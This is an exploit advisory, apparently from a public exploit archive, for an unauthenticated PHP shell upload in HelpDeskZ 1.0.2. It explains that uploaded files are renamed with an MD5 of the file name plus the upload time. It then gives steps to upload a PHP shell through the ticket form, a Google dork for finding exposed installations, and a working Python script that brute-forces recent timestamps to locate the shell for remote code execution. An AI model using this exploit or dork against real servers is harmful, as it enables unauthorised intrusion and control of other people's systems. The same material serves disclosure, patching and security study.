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HelpDeskz 1.0.2 Shell Upload

Posted on 30 August 2016

# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload # Google Dork: intext:"Help Desk Software by HelpDeskZ" # Date: 2016-08-26 # Exploit Author: Lars Morgenroth - @krankoPwnz # Vendor Homepage: http://www.helpdeskz.com/ # Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip # Version: <= v1.0.2 # Tested on: # CVE : HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability. The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file: /controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141* $filename = md5($_FILES['attachment']['name'].time()).".".$ext; So by guessing the time the file was uploaded, we can get RCE. Steps to reproduce: http://localhost/helpdeskz/?v=submit_ticket&action=displayForm Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket. Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded: exploit.py http://localhost/helpdeskz/ phpshell.php ''' import hashlib import time import sys import requests print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit' if len(sys.argv) < 3: print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]) sys.exit(1) helpdeskzBaseUrl = sys.argv[1] fileName = sys.argv[2] currentTime = int(time.time()) for x in range(0, 300): plaintext = fileName + str(currentTime - x) md5hash = hashlib.md5(plaintext).hexdigest() url = helpdeskzBaseUrl+md5hash+'.php' response = requests.head(url) if response.status_code == 200: print "found!" print url sys.exit(0) print "Sorry, I did not find anything"